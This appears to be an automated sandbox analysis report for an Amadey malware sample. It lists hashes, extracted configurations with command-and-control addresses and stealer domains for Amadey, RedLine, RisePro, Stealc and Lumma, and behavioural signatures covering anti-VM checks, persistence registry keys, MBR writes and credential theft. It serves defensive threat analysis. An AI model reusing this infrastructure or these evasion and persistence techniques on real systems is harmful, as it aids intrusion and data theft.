amadey | 34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
31/05/2024, 01:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
Size

1.8MB
MD5

d9b5bd7a933dc1dc54c540b1d5e1a7ac
SHA1

dedb2e269741d47cf4e6e8353d192b062e509809
SHA256

34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb
SHA512

51df5e6c5a682bfac97d5d288355753b4851847beefa0dd6df545960f3decc441106141ba53be1ab55f74e721435c70c36885acf2b10e637267e291a063cd970
SSDEEP

24576:Mw1CO7I7ljsEr2GdKT27n9VdRxXiu9OmVMpyLAGLobOimmzKZBRbZ+:tX7MQErAKz9HLXR96ybeOVz

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

http://147.45.47.155

Attributes

install_dir
9217037dc9
install_file
explortu.exe
strings_key
8e894a8a4a3d0da8924003a561cfb244
url_paths
/ku4Nor9/index.php

rc4.plain

Extracted

Family

amadey

Version

4.21

Botnet

49e482

http://147.45.47.70

Attributes

install_dir
1b29d73536
install_file
axplont.exe
strings_key
4d31dd1a190d9879c21fac6d87dc0043
url_paths
/tr8nomy/index.php

rc4.plain

Extracted

Family

redline

Botnet

185.215.113.67:40960

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

185.172.128.33:8970

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

stealc

Botnet

zzvv

http://23.88.106.134

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

lumma

https://roomabolishsnifftwk.shop/api

https://detailbaconroollyws.shop/api

https://horsedwollfedrwos.shop/api

https://patternapplauderw.shop/api

https://understanndtytonyguw.shop/api

https://museumtespaceorsp.shop/api

https://buttockdecarderwiso.shop/api

https://considerrycurrentyws.shop/api

https://averageaattractiionsl.shop/api

https://femininiespywageg.shop/api

https://employhabragaomlsp.shop/api

https://stalfbaclcalorieeis.shop/api

https://civilianurinedtsraov.shop/api

https://messtimetabledkolvk.shop/api

https://deprivedrinkyfaiir.shop/api

https://relaxtionflouwerwi.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	C8VQANJgr5qxpu6q8o1ZlQUE.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023446-101.dat	family_redline
behavioral1/memory/2600-115-0x00000000004F0000-0x0000000000542000-memory.dmp	family_redline
behavioral1/files/0x000700000002344a-120.dat	family_redline
behavioral1/memory/1660-138-0x00000000000D0000-0x0000000000122000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	869ad9587e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2bf30d8f13.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
255	1056	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3492	powershell.exe
4120	powershell.exe
2632	powershell.EXE
4908	powershell.exe
836	powershell.exe
5072	powershell.exe

Downloads MZ/PE file

Sets file execution options in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe	MicrosoftEdgeUpdate.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0"	MicrosoftEdgeUpdate.exe

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	869ad9587e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	869ad9587e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2bf30d8f13.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2bf30d8f13.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	Newoff.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	download.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	NUDcnOd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	explortu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	869ad9587e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	axplont.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Executes dropped EXE 44 IoCs

pid	Process
4236	explortu.exe
4776	869ad9587e.exe
1732	axplont.exe
5016	2bf30d8f13.exe
224	33333.exe
2600	fileosn.exe
1660	svhoost.exe
3492	One.exe
540	lumma1234.exe
880	gold.exe
4532	swizzzz.exe
3136	file300un.exe
2060	Newoff.exe
220	axplont.exe
4564	explortu.exe
5408	Newoff.exe
5856	download.exe
5904	download.exe
4080	gvCB6r8URq2nYNOzoN8DUIuw.exe
5852	hC0GJcs7DpneAK2PnSD0aFRV.exe
6100	MicrosoftEdgeWebview2Setup.exe
5832	MicrosoftEdgeUpdate.exe
5948	EfSkjSIaEOZwTlKna4brVkvJ.exe
6104	MicrosoftEdgeUpdate.exe
5248	MicrosoftEdgeUpdate.exe
4500	MicrosoftEdgeUpdateComRegisterShell64.exe
5480	C8VQANJgr5qxpu6q8o1ZlQUE.exe
5696	MicrosoftEdgeUpdateComRegisterShell64.exe
5704	MicrosoftEdgeUpdateComRegisterShell64.exe
5788	MicrosoftEdgeUpdate.exe
6124	MicrosoftEdgeUpdate.exe
5416	MicrosoftEdgeUpdate.exe
6104	MicrosoftEdgeUpdate.exe
3260	LVZUWIeVyGecZ86mtEnuszPl.exe
3500	Install.exe
4640	Install.exe
6132	Install.exe
4796	explortu.exe
5668	axplont.exe
6108	Newoff.exe
3096	NUDcnOd.exe
4532	MicrosoftEdge_X64_125.0.2535.79.exe
1224	setup.exe
5548	setup.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	2bf30d8f13.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplont.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplont.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplont.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	869ad9587e.exe

Loads dropped DLL 17 IoCs

pid	Process
4080	gvCB6r8URq2nYNOzoN8DUIuw.exe
5832	MicrosoftEdgeUpdate.exe
6104	MicrosoftEdgeUpdate.exe
5248	MicrosoftEdgeUpdate.exe
4500	MicrosoftEdgeUpdateComRegisterShell64.exe
5248	MicrosoftEdgeUpdate.exe
5696	MicrosoftEdgeUpdateComRegisterShell64.exe
5248	MicrosoftEdgeUpdate.exe
5704	MicrosoftEdgeUpdateComRegisterShell64.exe
5248	MicrosoftEdgeUpdate.exe
5788	MicrosoftEdgeUpdate.exe
6124	MicrosoftEdgeUpdate.exe
5416	MicrosoftEdgeUpdate.exe
5416	MicrosoftEdgeUpdate.exe
6124	MicrosoftEdgeUpdate.exe
6104	MicrosoftEdgeUpdate.exe
1056	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 33 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2B1EC306-3EDE-4012-9BB0-FB836132FF52}\InProcServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2B1EC306-3EDE-4012-9BB0-FB836132FF52}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2B1EC306-3EDE-4012-9BB0-FB836132FF52}\InProcServer32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2B1EC306-3EDE-4012-9BB0-FB836132FF52}\InProcServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2B1EC306-3EDE-4012-9BB0-FB836132FF52}\InProcServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2B1EC306-3EDE-4012-9BB0-FB836132FF52}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\INPROCSERVER32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2B1EC306-3EDE-4012-9BB0-FB836132FF52}\InProcServer32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\INPROCSERVER32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2B1EC306-3EDE-4012-9BB0-FB836132FF52}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2B1EC306-3EDE-4012-9BB0-FB836132FF52}\InProcServer32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2bf30d8f13.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\2bf30d8f13.exe"	explortu.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	NUDcnOd.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	NUDcnOd.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
80	pastebin.com
83	pastebin.com
147	iplogger.com
148	iplogger.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
156	ipinfo.io
152	api.myip.com
153	api.myip.com
155	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	gvCB6r8URq2nYNOzoN8DUIuw.exe

Checks system information in the registry 2 TTPs 8 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe

Drops file in System32 directory 35 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	NUDcnOd.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	C8VQANJgr5qxpu6q8o1ZlQUE.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4	NUDcnOd.exe
File opened for modification	C:\Windows\System32\GroupPolicy	C8VQANJgr5qxpu6q8o1ZlQUE.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	NUDcnOd.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	C8VQANJgr5qxpu6q8o1ZlQUE.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	NUDcnOd.exe
